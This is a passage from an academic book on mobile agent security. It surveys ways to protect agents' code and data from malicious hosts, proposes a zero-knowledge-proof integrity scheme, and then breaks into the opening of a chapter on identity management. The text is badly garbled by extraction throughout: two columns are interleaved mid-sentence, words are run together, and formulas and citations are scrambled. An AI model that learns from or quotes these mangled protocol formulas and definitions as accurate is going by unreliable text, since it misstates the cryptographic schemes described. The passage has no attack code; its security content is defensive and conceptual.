program is transformed into different obfuscated an input x and is willing to compute f(x) for A,
programs.Thedifficultyistotransform - the
but pro B to learn nothing substantial about
A wants
gram in a way that the original (or a similar, easily f. Moreover, B should not need interacting with A
understandable) program cannot be re-engineered during the computation of f(x).
automatically. Another problem is that it is quite
difficulttomeasurethequalityofobfuscation, The functionasf can be, for example, a signature
this not only depends on the used algorithm, but algorithm with an embedded key or an encryption
on the ability of the re-engineering as well. Some algorithm containing the one. This would enable
practical methods of code obfuscation are described the agent to sign or encrypt data at the host without
by Low (1998) and general taxonomy proposed by revealing its secret key.
Coilberg, Thomborson, and Low (1997). Although the idea is straightforward, it is hard
Since an agent can become invalid before tofindtheappropriateencryptionschemesthatca
completing its computation, the obfuscated code transform arbitrary functions as shown. So far,
is suitable for applications that do not convey the techniques to encrypt rationale functions and
information intended for long-lived concealment. polynomials have been proposed. Also a solution
Also, it is still possible for an attacker to read and based on the RSA cryptosystem was described
manipulate data and code but, as a role of these (Burmester et al, 2000).
elements cannot be determined, the results of this
attack are random and have no meaning for the
attacker.

cryptographic traces key of the originator has to be known by all agent

places. This can occur when the originator is a
The articles by Vigna (1997, 1998) introduced rather big company that is known by its smaller
cryptographic traces (also called execution traces) suppliers.
to provide a way to verify the correctness of the Assume that rn is a random number that is gener-
execution of an agent. The method is based on traces ated by nth host. This value will be used as a secret
of the execution of an agent, which can be requested key in a MAC. The partial result on (single piece
by the originator after the agent’s termination and of data, generated on n host), rn and the identity
usedasabasisfortheexecutionverification. Theare encrypted with the public key
of the next host
technique requires each platform involved to cre- of the originator Ki0, forming the encapsulated
ate and retain a non-repudiation log or trace of the message On:
operations performed by the agent while resident
there and to submit a cryptographic hash of the trace On = {rn, on, id(in+1)}Ki0
uponconclusionasatracesummaryorfingerprint.
The trace is composed of a sequence of statement A chaining relation is defined as follows
identifiers and the platform signature - (here Hinforma
denotes a hash-function and h denotes
tion. The signature of the platform is needed only the digest):
for those instructions that depend on interactions
with the computational environment maintained h0 = {r0, o0, id(i1)}Ki0
by the platform. For instructions that rely only on
the values of internal variables, the signature is and
not required and therefore is omitted.
This mechanism allows detecting attacks hn+1 = H{hn, rn, on, id(in+1))
against code; state and control ow fl of mobile
agents. This way, in the case of tampering, the When an agent is migrating from host in to
agent’s owner can prove that the claimed opera- in+1 :
tions could never been performed by the agent. The
techniquealsodefinesasecureprotocol in → ito
n
+1convey
: {O0, ..., On, hn+1}
agents and associated security-related information
among the various parties involved, which may Similar schemes are also called partial results
include a trusted third party to retain the sequence encapsulation methods (Jansen, 2000).
of trace summaries for the agent’s entire itinerary.
The approach has a number of drawbacks, the most watermarking
obvious being the size and number of logs to be
retained, and the fact that the detection process is Watermarking is mainly used to protect the copy-
triggered sporadically, based on suspicious results’ rights for digital contents. A distributor or an
observations or other factors. owner of the content embeds a mark into a digital
object, so its ownership can be proven. This mark
chained MAc Protocol is usually secret. Most methods exploit information
redundancy and some of them can also be used to
Different versions of chained message authenti- protect the mobile agent’s data and code.
cation code (MAC) protocol were described by A method of watermarking of the mobile code
Karjoth, Asokan, and Gulcu (1999) and Yee (1999). was proposed by Esparza, Fernandez, Soriano,
Some of them require existence of public key in- Munoz, and Forne (2003). A mark is embedded into
frastructure, others are based on a single key. This the mobile agent by using software watermarking
protocol allows an agent to achieve strong forward techniques. This mark is transferred to the agent’s
integrity. To utilize this protocol, only the public results during the execution. For the executing

hosts, the mark is a normal part of results and is fingerprinting

“invisible.” If the owner of the agent detects that
the mark has been changed (it is different than Software fingerprinting uses watermarking
expected), he or she has proof that the malicious techniques in order to embed a different mark
host was manipulating the agent’s data or code. for each user. Software fingerprinting shares
Figure 1 illustrates how the mark is appended to weaknesses with software watermarking: marks
data during the mobile agent’s computations on must be resilient to manipulation and “invisible”
various hosts. to observers.
The paper by Esparza et al. (2003) presents Themethodforfingerprintingwasproposedby
three ways of embedding the watermark into the Esparza et al. (2003). Contrary to the watermarking
agent: methods presented previously here, the embedded
mark is different for each host. When the agent re-
• Marking the code turns to the owner, all results are validated and the
• Marking the input data malicious host is directly traced (see Figure 2).
• Marking the obfuscated code The article presents two ways of embedding
the mark into the agent:
The mark or marks are validated after the agent
returns to its originator. • Marking the code: In this case, malicious
Possible attacks against this method include: hosts have the possibility of comparing
their different codes in order to locate their
• Eavesdropping: If the data is not protected marks.
in any way (e.g., not encrypted) it can be read • Marking the input data: The data are usu-
by every host. ally different for each host, so it is harder to
• Manipulation: The malicious host can try to identify the mark.
manipulate either the agent’s code or data to
change the results and still keep the proper The procedure is similar to the mobile agent
mark. watermarking approach. However, the owner must
• Collusion: A group of malicious hosts can know each mark for each host and their location.
cooperate to discover the mark by comparing One of the possibilities of reconstructing the marks
the obtained results. is to catch the information about the previously
chosen places in the results.
Figure 1. Example of watermarking

Figure2.Exampleoffingerprinting
Possible attacks against this method include: agent place, which receives an agent to verify that
it has not been compromised. This saves computing
• Eavesdropping: If the data are not protected power because if an agent has indeed been com-
in any way (e.g., not encrypted) it can be read promised, the agent place can reasonably refuse
by every host. to execute the compromised agent.
• Manipulation: The malicious host can try to
manipulate either the agent’s code or data to Environmental key generation
change the results and still keep the proper
mark. Thisschemeallowsanagenttotakeapredefined
• Collusion: Colluding hosts cannot extract action when some environmental condition is true
any information about the mark comparing (Riordan & Schneier, 1998). The approach centers
their data or results, because every host has a on constructing agents in such a way that upon
different input data and a different embedded encountering an environmental condition (e.g., via
mark. a matched search string), a key is generated, which
is then used to cryptographically unlock some
The difference between mobile agent water- executable code. The environmental condition is
markingandfingerprintingisthefacthidden that inthe
through either a one-way hash or public
second case it is possible to detect collusion attacks key encryption of the environmental trigger. This
performed by a group of dishonest hosts. technique ensures that a platform or an observer
of the agent cannot uncover the triggering mes-
Publicly Verifiable Chained digital sage or response action by directly reading the
signatures agent’s code.
This protocol, proposed by Karjoth (1998) allows Itinerary recording with replication
verification of the agent’schainofpartial results
and voting
not only by the originator, but also by every agent
place. However, it is still vulnerable to interleaving A faulty agent platform can behave similarly to a
attacks. This protocol makes it possible for every malicious one. Therefore, applying fault tolerant

capabilities to this environment should help coun- • If we have x1 and f(x1) then it is computationally
ter the effects of malicious platforms (Schneider, infeasibletofind that f(x1=) f(x2)
x2 such
1997). One such technique for ensuring that a
mobile agent arrives safely at its destination is If the secret is kept within an agent, then also
through the use of replication and voting. Rather the host can use the zero-knowledge protocol to
than using a single copy of an agent to perform a verify it. Every authorized change of agent’s state
computation, multiple copies are used. Although results in such a change of the secret that the secret
a malicious platform may corrupt a few copies of remains valid. On the other hand, every unauthor-
the agent, enough replicas avoid the encounter to ized change leads to loosing the secret, so at the
successfully complete the computation. A slightly moment of verification by host or manager, the
different method based on multiple copies of agent agent is not able to prove possession of a valid
was proposed by Benachenhou and Pierre (2006). secret. Since the host can monitor all agent’s com-
In this proposal, the copy of agent is executed on putations, the secret should not only change with
a trusted platform to validate results obtained on agent’s execution state, but should also be different
other platforms. for different hosts, so one host could only validate
the secret prepared for operations that should be
executed at this platform. In our system the host can
A MEtHod bAsEd on sEcrEts tamper the agent and try to make such changes that
And Proofs so that he/she will be still able to obtain the proper
secret, but the characteristics of function f will not
In the proposed system we assume that there exist allow doing this. Some possible candidates for the
at least three parties: function f can be a hash function. Our approach is
a detection rather than prevention (see Zwierko &
• A manager Kotulski, 2007).
• An agent
• A host Specification of the Method
The manager can be an originator of the agent. The Initial Phase

It plays a role of a verification instance in the
scheme and creates initial countermeasures for the The initial phase has three steps:
agent. The manager also plays a role of a trusted
third party. 1. The manager computes a set of so-called
identities, denoted as ID. It is public. For each
outline of the Method identity, the manager computes appropriate
secret,denotedasN.Thedetails - forgenerat
The zero-knowledge proof systems (Goldreich, ing those values depend upon chosen zero
) 0enable
2 the verifier to check validity of the knowledge system.
assumption that the prover knows a secret. In our .2 To compose N into an agent, any secure - se
systemtheverifierwouldbethemanagerorowner cret sharing scheme (Pieprzyk, Hardjono, &
of agents and, obviously, agents would be the prov- Seberry, 2003) with threshold t can be used.
ers. In the initial phase, the manager computes a The manager creates n shares, such that the
set of secrets. The secrets are then composed into reconstructedsecretwould beN.The
t-1 shares
the agent, so that if the manager asks the agent to are composed into an agent and the rest are
make some computations (denote them as a function distributed among the hosts via secure chan-
f ), the result of this would be a valid secret. This nels (this is illustrated in Figure 3).
function should have the following property: 3. The manager now needs to glue the shares
into an agent in such a way, that when the

agent is in a proper execution state, it is able only from this state. Additionally, some internal
to obtain from its code/state variables the cor- variables that differ for each host should be utilized
rect shares. Since the agent is nothing more to obtain different secrets for each host. Thus, to
than a computer program, it can be described create agent’s shares, f j, ci ∈ Σ, and the code should
as a finitestatemachine (FSM). Assume, we be used.
have the agent of the form <Σ, S, SI, SF, δ>, In other cases, where the pair f j and ci is not
where: unique for each host, the previous states or other
data should be used. It should be possible to obtain
• Σ is the input alphabet the proper shares for current host based on appropri-
• S = {f 0, …, fn} is a set of all possible ate execution state and internal variables. If there
states is more than one unique combination of ( f j, ci) for
• SI is a subset of S with all initial states one host, then for each of them the host should
• SF is a subset of Swithallfinishingstates, obtain an ID and a share. The agent’s code (in a
possibly empty certain form) should be a part of the data that are
• δ: Σ × S → S is a state transition func- required to recreate the secret to enable detection
tion. of every unauthorized manipulation, which could
be performed by previous host.
Figure 4 shows an example of agent’s FSM. It To create the shares from the mentioned data,
is obvious that only some execution states should the hash function or an encryption function with
be observed during the computation at the host the manager’s public key can be used.
platform (e.g., the ones connected with gathering
and storing the data). If the state f jisthefirststate The Validation Phase
of the agent’s computations at the host platform,
then it is natural that the shares should be generated 1. The host, which wants to verify an agent’s
integrity, sends its share to the agent.
Figure 3. Distributing ID and shares to hosts
Figure 4. Mobile agent as an FSM

2. The agent creates the rest of the shares from Definition(Karjoth

2 etal.Yee,19; , The
19).
its code and the execution state. It recreates agent posses the weak forward integrity feature if
the secret. The agent computes the secret σ the integrity of each partial result m0, …, mn-1 is
and uses it for the rest of the scheme, which providedwheninisthefirstmaliciousagentplace
isazero-knowledgeidentificationon protocol.
the itinerary.
3. The agent and the host execute the selected
zero-knowledge protocol, so that the host can Weak forward integrity is conceptually not
confirmthecorrectness σ. of resistant to cooperating malicious hosts and agent
places that are visited twice. To really protect the
The manager can compute many identities, which integrity of partial result, we need a definitio
may be used with different execution states. In that without constraints.
situation the agent should first inform host which
identity should be used, or the host can simply check Definition 3 [strong forward integrity (Karjoth
the correctness of σ for all possible identities. etal.,19)]. Theagentsystempreserves strong
forward integrity of the agent if none of the agent’s
encapsulated messages mk, with k < n, can be
sEcurIty And scAlAbIlIty modifiedwithoutnotifyingthemanager.
Definitions and Notions In this chapter we refer to forward integrity as

to strong forward integrity (when applicable). To
This section presents basic notions concerning make notion of forward integrity more useful, we
agent’s integrity that will be later used in description define also publicly verifiable forward integrity
of the selected solutions. The integrity of an agent which enables any host to detect compromised
means that an unauthorized party cannot change agents:
its code or execution state, or such changes should
be detectable (by an owner, a host or an agent plat- DefinitionThe 4. agentpossesthepubliclyverifi-
form, which want to interact with the agent). The able forward integrity if every host in can verify
authorized changes occur only when the agent has that the agent’s chain of partial results mi0 ,…,
to migrate from one host to another. Next is a more min has not been compromised.
formaldefinition:
The other important notion concerning agent’s
Definition 1 integrity
( of an agent). An agent’s
integrity, a concept of black-box security (Hohl,
integrity is not compromised if no unauthorized 1998) was introduced in the Time Limited Black-
modificationcanbemadewithouttheagent’s owner
Box Security and Obfuscated Code section.
noticingthismodification.
Analysis
The concept of forward integrity is also used
for evaluation of many methods (Karjoth et al., The proposed scheme should be used with more
1999; Yee, 1999). This notion is used in a system that one identity. This would make it very hard
where agent’s data can be represented as a chain of to manipulate the code and the data. The best
partial results (a sequence of static pieces of data). approach is to use one secret for each host. We
Forward integrity can be divided into two types, assume that the malicious host is able to read and
which differ in their possibility to resist cooperating manipulate an agent’s data and code. He/she can
malicious hosts. The general goal is to protect the try to obtain from an agent’s execution state the
results within the chain of partial results from being proper shares. The host can also try to obtain a
modified. Given a sequence of partial results, the
proper secret and manipulate the agent’s state and
forwardintegrityisdefinedasfollows:variables in a way that the obtained secret would

stay the same. But the host does not know other  Medium: The method has been imple-
secrets that are composed into the agents; also mented, with much effort
he/she does not know more shares to recreate those  Easy: The method is widely used and
secrets, so, any manipulation would be detected has been implemented for different
by the next host. purposes
The protocol is not able to prevent any attacks and what elements of an agent it protects:
that are aimed at destroying the agent’s data or • Theoretical evaluation: If the method satis-
code, meaning that a malicious host can “invali- fiesthesecuritydefinitions Defini
from
- the
date” any agent’s data. But this is always a risk, tions and Notions section.
since the host can simply delete an agent.
The theoretical evaluation is quite hard, because
• Weak forward integrity: The proposed some methods that have the black-box property do
method posses the weak forward integrity not“fit”otherdefinitions.Ifthecodeordatacannot
property:themalicioushostcannot beefficiently
read or manipulated (the ideal case), then how
modify previously generated results. wecandiscussifitcanbeverifiable,or,ifitfulfills
• Strong forward integrity: The protocol the forward integrity.
provides the agent also with strong forward As for evaluation of the black-box property, it is
integrity, because the host cannot change very hard to provide the code that cannot be read. In
previously stored results (without knowledge all cases, marked by *, (see Table 2) the adversary
of secrets created for other hosts). He/she can modify the agent but not in a way that owner
cannot also modify the agent in a way that or other host would not notice. This means that no
could be undetectable by the next host on the efficientmanipulationattackcanbemade,soone
itinerary or by the owner. partoftheblack-boxpropertyissatisfied.
• Publicly verifiable forward integrity: Each In # case the publiclyverifiableforwardintegrity
host can only verify if the agent’s code or the issatisfiedonlypartially,becausetheagent’scod
execution state has not been changed. They canbeverifiedbutthedatacannot.
cannot check wherever the data obtained on
otherplatformshasnotbeenmodified. The
scalability
agent’s owner, who created all secrets, can
only do this. The initialization phase.Thefirstphaseissimilar
• Black-box security: The proposed system to the bootstrap phase of the system. The hosts and
is not resistant to read attacks. A malicious the manager create a static network. It is typical
host can modify the code or data, but it is for agents’ systems that the manager or the owner
detectable by agent’s owner, so it is resistant of an agent knows all hosts, so distribution of all
to manipulation attack. The system does not IDsandsharesisefficient.Wecancomparethisto
have full black-box property. sending a single routing update for entire network
asinOSPFprotocolthe ( ooding)
fl Whenever
. anew
comparison with other Methods agent is added to the system, the same amount of
information to all hosts has to be sent. Since the
Itisadifficulttasktocomparesystems based
messages on
are not long (a single share and few IDs)
such different approaches as presented here. We and are generated only during creating a new agent,
decided to split comparison into two categories: that amount of information should not be a problem.
The sizes of parameters (keys lengths, number of
• Practical evaluation: If the method is hard puzzles, and number of shares) are appropriately
or easy to implement: adjusted to the agents’ network size.
 Hard: No practical implementation ex- The operating phase. During the validation
ists at the moment phase no additional communication between the
manager and the hosts is required.

Table 1. Practical comparison of the integrity protection methods
Implementation Protects code Protects data Protects execution state

Method
Encryption functions Hard Yes Yes No
Obfuscated code Medium Yes No No
Cryptographic traces Hard Yes No Yes
Watermarking Easy Yes Yes No
Fingerprinting Easy Yes Yes No
Zero knowledge proof Easy Yes Yes Yes
Table 2. Theoretical comparison of integrity protection methods
Weak forward Strong forward Publiclyverifiable Black-box

integrity integrity forward integrity property
Method
Encryption functions No No No Yes
Obfuscated code Yes Yes No Partially*
Cryptographic traces Yes Yes Yes No
Watermarking Yes No No Partially*
Fingerprinting Yes Yes No Partially*
Zero knowledge proof Yes Yes No# Partially*
Modifications next possibility for the future work would be to

integrate the proposed solution to some agents’
A similar scenario can be used to provide integrity security architecture, possibly the one that would
to the data obtained by the agent from different also provide an agent with strong authentication
hosts. A malicious host could try to manipulate methods and anonymity (Zwierko & Kotulski,
the data delivered to the agent by the previously 2005). Then, such a complex system should be
visited hosts. To ensure that this is not possible, evaluated and implemented as a whole. A good
the agent can use the zero-knowledge protocol to example of such a system would be an agent-based
protect the data. For each stored piece of data, the electronic elections system for mobile devices,
agent can create a unique “proof,” utilizing the where the code integrity together with the anony-
zero-knowledge protocol. Any third party, who mous authentication is crucial for correctness of
does not possess σ, is not able to modify the proof. the system (Zwierko & Kotulski, in press).
So the manager knowing σ can be sure that the
data was not manipulated.
An area for development of the proposed futurE trEnds
integrity solution is to find the most appropriate
function for composing secrets into hosts: The In this chapter we presented methods of protection
proposed solution fulfills the requirements, of mobile agentsbut
against attacks on their integrity.
some additional evaluation should be done. The The methods offer protection on a certain level, but

theagents’securitycanbesignificantly rity. increased

The data unavailable is useless for a potential
by avoiding risky behavior, especially visiting suspi- user.Also,thedataillegallydefectedorfalsifiedis
cious hosts. This can be done by using mechanisms worthless source of information. No other protection
built into individual agents or by distributed solu- has sense if the data’s content is destroyed. In the
tions based on cooperation of agents and hosts. The case of executables we face analogous problems.
most promising solutions for improvement of the Except others, the executables must be available and
mobile code security can be based on risk analysis protectedagainstfalsificationthat ( isunautho
oronreputationsystems.Thefirstoneneeds changes ofsome
the designed functioning, internal state
built-in analysis tools while the second one requires and the carried data). The problem of availability
trust management infrastructure. has been successfully solved by a concept of mobile
Risk analysis is one of the most powerful tools agents that simply go to the destination place and
used in economics, industry, and software engi- work in there. However, this solution made the
neering (Tixier, Dusserre, Salvi, & Gaston, 2002). problem of integrity of the mobile code or mobile
Most of the business enterprises carry out such an agent even more important than in the case of the
analysis for all transactions. The multi-agent or storeddata.Thefalsifiedmobileagentisnotonly
mobile agent system can be easily compared with useless. It can be even harmful as an active party
such an economic-like scenario: There are a lot making some unplanned actions. Therefore, pre-
of parties making transactions with other parties. serving agents’ integrity is a fundamental condition
The risk analysis could be utilized to estimate how of their proper functioning.
high is the probability that selected agent platform In this chapter we made an overview of the
is going to harm the agent. The biggest advantage existing protocols and methods for preserving the
of this solution is lack of any form of cooperation agent’sintegrity.Thebasicdefinitionsandnotio
between different managers: Everyone can make its were introduced. The most important mechanisms
own analysis based on gathered knowledge. How- were presented and discussed. We also proposed a
ever, the cooperation between different managers new concept for detection of the tempering of an
canbenefitinbetteranalysis. agent, based on a zero-knowledge proof system.
Reputation systems (Sabater & Sierra, 2005; The proposed scheme secures both, an agent’s
Zacharia & Maes, 2000) are well known and execution state and the internal data along with its
utilized in different applications, especially in code. For the practical implementation the system
peer-to-peer environments. They enable the detec- requires some additional research and development
tion of malicious parties based on their previous work, but it looks to be a promising solution to
behavior, registered, valuated, and published. We the problem of providing an agent with effective
can imagine an agent system where managers and and strong countermeasures against attacks on its
owners of agents would also rate agent platforms integrity.
based on their previous actions towards the agents.
Of course, such a system still requires some in-
tegrity protection mechanisms, which could be rEfErEncEs
used to verify if results obtained by the agent are
correct. However, the applied mechanism can be Alves-Foss, J., Harrison, S., & Lee, H. (2004,
rather simple, not as complicated as some presented January 5-8). The use of encrypted functions for
methods, for example, EFs. mobile agent security. In Proceedings of the 37th
Hawaii International Conference on System Sci-
ences—Track 9 (pp. 90297b). US: IEEE Computer
concludIng rEMArks Society Press.
Benachenhou, L., & Pierre, S. (2006). Protection
Among security services for stored data protection
of a mobile agent with a reference clone. Computer
two are the most important: availability and integ-
communications, (2),92 268-278.
0
Burmester, M., Chrissikopoulos, V., & Kotzaniko- Kulesza, K., & Kotulski, Z. (2003). Decision systems
laou, P. (2000). Secure transactions with mobile in distributed environments: Mobile agents and
agents in hostile environments. In E. Dawson, A. their role in modern e-commerce. In A. Lapinska
Clark, & C. Boyd (Eds.), Information security and (Ed.), Proceedings of the Conference “Information
privacy. Proceedingsoftheth 5 Australasian- in XXICon Century Society” (pp. 271-282). Olsztyn:
ference ACISP (LNCS 1841, pp. 289-297). Berlin, Warmia-Mazury University Publishing.
Germany: Springer.
Kulesza, K., Kotulski, Z., & Kulesza, K. (2006).
Coilberg, Ch., Thomborson, C., & Low, D. (1997). On mobile agents resistant to traffic analysis
A taxonomy of obfuscating transformations (Tech. Electronic Notes in Theoretical Computer Science,
Rep. No. 148). Australia: The University of Auck- 142, 181-193.
land.
Low, D. (1998). Protecting Java code via code
Corradi, A., Cremonini, M., Montanari, R., & obfuscation. Crossroads, 4(3), 21-23.
Stefanelli, C. (1999). Mobile agents integrity for
Man, C., & Wei, V. (2001). A taxonomy for attacks
electronic commerce applications. Information
on mobile agent. In Proceedings of the Interna-
Systems, 24(6), 519-533.
tional Conference on Trends in Communications,
Esparza, O., Fernandez, M., Soriano, M., Munoz, J. EUROCON’2001 (pp. 385-388). IEEE Computer
L., & Forne, J. (2003). Mobile agents watermarking Society Press.
andfingerprinting:Tracingmalicioushosts.InV.
Oppliger, R. (2000). Security technologies for the
Ma7ík,W.Retschitzegger,O.& tΩ Š pánková(Eds.,)
World Wide Web. Computer Security Series. Nor-
Proceedings of the Database and Expert Systems
wood, MA: Artech House Publishers.
Applications (DEXA 2003) (LNCS 2736, pp. 927-
936). Berlin, Germany: Springer. Pieprzyk, J., Hardjono, T., & Seberry, J. (2003).
Fundamentals of computer security. Berlin, Ger-
Goldreich, O. (2002). Zero-knowledge twenty
many: Springer.
years after its invention (E-print 186/2002). E-
print, IACR. Riordan, J., & Schneier, B. (1998). Environmental
key generation towards clueless agents. In G. Vinga
Hohl, F. (1998). Time limited blackbox security:
(Ed.), Mobile agents and security (pp. 15-24). Berlin,
Protecting mobile agents from malicious hosts. In
Germany: Springer.
G. Vigna (Ed.), Mobile agents and security (LNCS
1419, pp. 92-113). Berlin, Germany: Springer. Sabater, J., & Sierra, C. (2005). Review on com-
putational trust and reputation models. Artificial
Jansen, W. A. (2000). Countermeasures for mobile
Intelligence Review, 24 (1), 33-60.
agent security. [Special issue]. Computer Commu-
nications, 23(17), 1667-1676. Sander, T., & Tschudin, Ch. F. (1998, May 3-6).
Towards mobile cryptography. In Proceedings of
Jansen, W. A., & Karygiannis, T. (1999). Mobile
theIEEE
89 1 SymposiumonSecurityandPrivacy
agents security (NIST Special Publication 800-19).
(pp. 215-224). IEEE Computer Society Press.
Gaithersburg, MD: National Institute of Standards
and Technology. Schneider, F. B. (1997). Towards fault-tolerant and
secure agentry. In M. Mavronicolas (Ed.), Proceed-
Karjoth, G., Asokan, N., & Gulcu, C. (1999). Protect-
ings 11th International Workshop on Distributed Al-
ing the computation results of free-roaming agents.
gorithms (pp. 1-14). Berlin, Germany: Springer.
In K. Rothermel & F. Hohl (Eds.), Proceedings
of the Second International Workshop on Mobile Shao, M., & Zhou, J. (2006). Protecting mobile-agent
AgentsMA ( ’9)8 (LNCS 1477, pp. 195-207). Berlin, data collection against blocking attacks. Computer
Germany: Springer. Standards & Interfaces, 28(5), 600-611.

Tixier, J., Dusserre, G., Salvi, O., & Gaston, D. executed. The software agent cannot perform its
(2002). Review of 62 risk analysis methodologies actions outside hosts. The host protects agents
of industrial plants. Journal of Loss Prevention in against external attacks.
theProcessIndustries, 51
(4), 291-303.
Cryptographic Protocol: Cryptographic pro-
Vigna, G. (1997). Protecting mobile agents through tocol is a sequence of steps performed by two or
tracing. In Proceedings of the 3rd ECOOP Workshop more parties to obtain a goal precisely according to
on Mobile Object Systems. Jyvälskylä, Finland. assumed rules. To assure this purpose the parties
use cryptographic services and techniques. They
Vigna, G. (1998). Cryptographic traces for mobile
realize the protocol exchanging tokens.
agents. In G. Vigna (Ed.), Mobile agents and secu-
rity (LNCS 1419, pp. 137-153). Berlin, Germany: Intelligent Software Agent: Intelligent soft-
Springer. ware agent isanagentthatusesartificialintellige
in the pursuit of its goals in contacts with hosts
Wang, T., Guan, S., & Chan, T. (2002). Integrity
and other agents.
protection for code-on-demand mobile agents in
e-commerce. Journal of Systems and Software, Mobile Agent: Mobile agent is an agent that
06 (3), 211-221. can move among different platforms (hosts) at
different times while the stationary agent resides
Yee, B. S. (1999). A sanctuary for mobile agents.
permanently at a single platform (host).
In J. Vitek & C. D. Jensen (Eds.), Secure Internet
programming: Security issues for mobile and dis- Security Services: Security services guarantee
tributed objects (LNCS 1603, pp. 261-273). Berlin, protecting agents against attacks. During agent’s
Germany: Springer. transportationthecodeisprotectedasausua
Atthehostsite,theagentisopenformodification
Zacharia, G., & Maes, P. (2000). Trust management
and very specific methods must be applied for
through reputation mechanisms. AppliedArtificial
protection. For the agent’s protection the following
Intelligence, 14(9), 881-907.
security services can be utilized:
Zwierko, A., & Kotulski, Z. (2005). Mobile agents:
• Confidentiality: Confidentiality is any
Preserving privacy and anonymity. In L. Bolc, Z.
private data stored on a platform or carried
Michalewicz, & T. Nishida (Eds.), Proceedings of
by an agent that must remain confidential.
IMTCI2004, International Workshop on Intelligent
Mobile agents also need to keep their present
Media Technology for Communicative Intelligence
locationandthewholerouteconfidential.
(LNAI 3490, pp. 246-258). Berlin, Germany:
• Integrity: Integrity exists when the agent
Springer.
platform protects agents from unauthorized
Zwierko, A., & Kotulski, Z. (2007). Integrity of mo- modification of their code, state, and data
bile agents: A new approach. International Journal and ensure that only authorized agents or
of Network Security, 2(4), 201-211. processescarryoutanymodificationofthe
shared data.
Zwierko, A., & Kotulski, Z. (2007). A lightweight • Accountability: Accountability exists when
e-voting system with distributed trust. Electronic each agent on a given platform must be held
NotesinTheoreticalComputer109- Science,,86 1 accountable for its actions: must be uniquely
126. identified,authenticated,andaudited.
• Availability: Availability exists when every
kEy tErMs agent (local, remote) is able to access data
and services on an agent platform, which
Agent Platform (Host): Agent platform is a responsible to provide them.
computer where an agent’s code or program is

• Anonymity: Anonymity is when agents’ Strong Mobility: Strong mobility of an agent

actions and data are anonymous for hosts means that a running program along with its
and other agents; still accountability should particular (actual) state is moving from one host
be enabled. site to another.
Weak Mobility: Weak mobility of an agent
Software Agent: Software agent is a piece
means that only the agent’s code is migrating
of code or computer program that can exercise
and no execution state is sent along with an agent
program.
autonomously at host toward a goal, and meet and
interact with other agents.

Chapter IV
Identity Management
Kumbesan Sandrasegaran
University of Technology, Sydney, Australia
Mo Li
University of Technology, Sydney, Australia
AbstrAct
Thebroadaimofidentitymanagement(IdM)istomanagetheresourcesofanorganization(such
records, data, and communication infrastructure and services) and to control and manage access to those
resourcesinanefficientandaccurateway.Consequently,identitymanagementisbothat
process-orientated concept. The concept of IdM has begun to be applied in identities-related applications
in enterprises, governments, and Web services since 2002. As the integration of heterogeneous wireless
networks becomes a key issue in towards the next generation (NG) networks, IdM will be crucial to the
success of NG wireless networks. A number of issues, such as mobility management, multi-provider and
securities require the corresponding solutions in terms of user authentication, access control, and so
forth. IdM in NG wireless networks is about managing the digital identity of a user and ensuring that
users have fast, reliable, and secure access to distributed resources and services of an next generation
network (NGN) and the associated service providers, across multiple systems and business contexts.
IntroductIon the integration of heterogeneous wireless networks

becomes a key issue in the fourth generation
The broad aim of identity management (IdM) (4G) wireless networks, IdM will become crucial
is to manage the resources of an organisation to the success of next generation (NG) wireless
such
( as files, records, data, and communication networks. A number of issues, such as mobil-
infrastructure and services) and to control and ity management, multi-provider, and securities
manage access to those resources inrequire an efficient
the corresponding solutions in terms of
and accurate way (which in part usually involves a user authentication, access control, and so forth.
degree of automation). Consequently, IdM is both Although IdM processes require the integration
a technical and process-orientated concept. into existing business processes at several levels
The concept of IdM has begun to be applied (Titterington, 2005), it remains an opportunity for
in identities-related applications in enterprise, NG wireless networks.
governments, and Web services since 2002. As
Identity Management
IdM in NG wireless networks is about man- • It should define the identity of an entitya (
aging the digital identity of a user and ensuring person, place, or thing).
that users have fast, reliable, and secure access to • It should store relevant information about
distributed resources and services of NG wireless entities, such as names and credentials, in
networks and associated service providers across asecure,exible,
fl customisablestore.
multiple systems and business contexts. • It should make the information accessible
through a set of standard interfaces.
Definition • It should provide a resilient, distributed, and
high performance infrastructure for identity
Given the open and currently non-standardised management.
nature of IdM, there are varying views as to the • It should help to manage relationships be-
exactdefinitionofIdM.Theseinclude: tween the enterprise and the resources and
otherentitiesinadefinedcontext.
By HP (Clercq & Rouault, 2004)
IdentityManagementcanbedefinedasthe Mainset of
Aspects
processes, tools and social contracts surround-
ing the creation, maintenance, utilization and Authentication
termination of a digital identity for people or,
more generally, for systems and services to enable Authentication is the process by which an entity
secure access to an expanding set of systems and provides its identity to another party, for example,
applications. by showing photo ID to a bank teller or entering
a password on a computer system. This process
By Reed (2002) is broken down into several methods which may
The essence of Identity Management as a solu- involve something the user knows (e.g., password),
tion is to provide a combination of processes and something the user has (e.g., card), or something
technologies to manage and secure access to the theuserise. ( g.fingerprint,
, iris,etc.Authentica-
.)
information and resources of an organisation tion can take many forms, and may even utilise
whilealsoprotectingusers’profiles. combinations of these methods.
ByCiscoSystems(205) Authorisation
Businesses need to effectively and securely manage
who and what can access the network, as well as Authorisation is the process of granting access
when, where, and how that access can occur...lets to a service or information based on a user’s role
enterprises secure network access and admission in an organisation. Once a user is authenticated,
at any point in the network, and it isolates and the system then must ensure that a particular user
controls infected or unpatched (sic) devices that has access to a particular resource.
attempt to access the network.
Access Control
objectives
Access control is used to determine what a user
As IdM can be used in different areas such as can or cannot do in a particular context (e.g., a
enterprise, government, Web services, telecom- usermayhaveaccesstoaparticularresource/file
munication networks and so forth, its objectives but only during a certain time of day, e.g., work
diversity in different contexts. Generally, the hours, or only from a certain device, e.g., desktop
IdM system is expected to satisfy the following intheoffice).
objectives (Reed, 2002):

Identity Management
Auditing and Reporting person to impersonate that individual. In a typical

face to face situation, identity comprises of two
Auditing and reporting involves creation and parts: the actual identity of the entity (something
keeping of records, whether for business reasons that can be observed by human senses) and the
(e.g., customer transactions), but also providing a credentials or what they use to prove their identity.
“trail” in the event that the system is compromised In Reed (2002), the attributes of digital identity
or found faulty. are given as follows:
Who You Are

dIgItAl IdEntIty “Who you are” is the attribute that in a real world
context uniquely identify a single entity. These
what is digital Identity? can include knowledge or data that is only known
by that entity, unique physical characteristics of
In a business transaction, identity is used to that entity, or items that the entity has.
establish a level of trust upon which business
can be conducted. Trust in this context is the Context
confidencethateachpartytheyaredealing Contextwith
can refer to the type of transaction or
is who he/she claims to be. Traditionally, such organisation that the entity is identifying itself as
trust was established with the use of an observ- well as the manner that the transaction is made.
able physical attribute of an entity. For example, Different constraint on digital identity may be
business dealings were in person (appearance), on enforced depending on the context. For example,
the phone (voice), or with the use of signatures thesensitivetransactionsrelated - tobirt
